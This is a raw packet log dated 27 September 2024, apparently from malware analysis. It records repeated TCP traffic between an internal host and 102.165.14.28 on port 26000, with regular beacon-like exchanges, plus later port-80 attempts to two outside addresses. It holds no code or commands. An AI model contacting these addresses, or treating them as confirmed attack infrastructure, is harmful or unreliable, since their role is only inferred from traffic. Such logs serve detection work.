                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388390064 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.388525963 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395598888 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395634890 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395654917 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395679951 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395704031 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395728111 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395751953 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395775080 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395800114 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395823002 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395847082 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395884991 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395895958 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395910025 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395934105 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395957947 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395961046 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395961046 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.395981073 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396006107 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396029949 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396053076 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396076918 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396100998 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396125078 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396130085 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396130085 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396147966 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396179914 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396209955 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396234035 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396258116 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396281004 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396301985 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396301985 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396305084 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396328926 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396353006 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396377087 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396404028 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396421909 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396446943 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396470070 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396470070 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396493912 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396517992 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396543026 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396564960 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396564960 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396567106 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396590948 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396614075 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396637917 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396661043 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396683931 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396708012 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396732092 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396754980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396770000 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396779060 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396804094 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396826982 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396835089 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396851063 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396874905 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396900892 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396919012 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396944046 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396966934 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.396991014 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397013903 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397026062 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397026062 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397037029 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397062063 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397085905 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397109032 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397131920 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397155046 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397178888 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397197962 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397202969 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397341967 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397341967 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397666931 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.397667885 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529295921 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529427052 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529536009 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529598951 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529655933 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529735088 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529769897 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.529894114 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.530015945 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.530045986 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.530131102 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.530419111 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532470942 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532586098 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532670021 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532691956 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532795906 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.532903910 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533004045 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533010006 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533107042 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533215046 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533257008 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533322096 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533426046 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533499956 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533520937 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533616066 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533653975 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533708096 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533797979 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533804893 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533881903 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533967018 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.533974886 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534061909 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534143925 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534157991 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534262896 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534313917 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.534482002 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.572262049 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665535927 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665637016 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665651083 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665663004 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665683985 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665695906 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665707111 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665718079 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665729046 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665740013 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665750980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665761948 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665772915 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665783882 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665795088 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665999889 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.665999889 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666065931 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666080952 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666091919 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666102886 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666114092 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666126013 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666136980 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666147947 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666158915 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666169882 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666181087 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666192055 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666203022 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666213989 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666224957 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666235924 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666246891 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666258097 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666269064 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666279078 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666290998 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666301966 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666312933 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666323900 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666342020 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666388035 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666388035 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666451931 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666465998 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666476965 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666649103 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.666817904 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670353889 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670368910 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670380116 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670480967 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670495987 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670506954 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670519114 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670530081 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670541048 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670552015 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670562983 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670572996 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670583963 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670648098 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670648098 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670814991 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.670984983 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.675836086 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.675957918 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.675975084 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.675982952 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.675995111 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676004887 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676016092 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676027060 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676038027 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676048994 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676059961 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676070929 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676080942 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676145077 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.676371098 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680588007 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680881023 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680895090 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680906057 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680917025 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680927992 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680938959 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680949926 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680960894 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680972099 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680983067 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.680994034 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.681005001 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.681060076 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.681157112 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.681325912 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.682214022 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.682229042 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.682240009 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.682249069 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:23.682534933 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.489684105 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.489732981 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.489780903 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.632749081 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.633043051 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.633093119 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.768858910 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.768876076 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.768887997 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.779145956 CEST2600049738102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:27.779257059 CEST4973826000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:37.837610960 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:37.839679003 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:44:38.026078939 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:07.839056969 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:07.841187954 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:08.025351048 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:37.861036062 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:37.863301992 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:45:38.049357891 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:08.617120028 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:08.619153023 CEST4973626000192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:08.802635908 CEST2600049736102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.430197954 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.430283070 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.565330982 CEST8049735102.165.14.28192.168.11.20
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.565586090 CEST4973580192.168.11.20102.165.14.28
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:09.930068970 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:10.930018902 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:12.913788080 CEST4973780192.168.11.20178.237.33.50
                                                                                                                                                                                                                                        Sep 27, 2024 16:46:16.881676912 CEST4973780192.168.11.20178.237.33.50
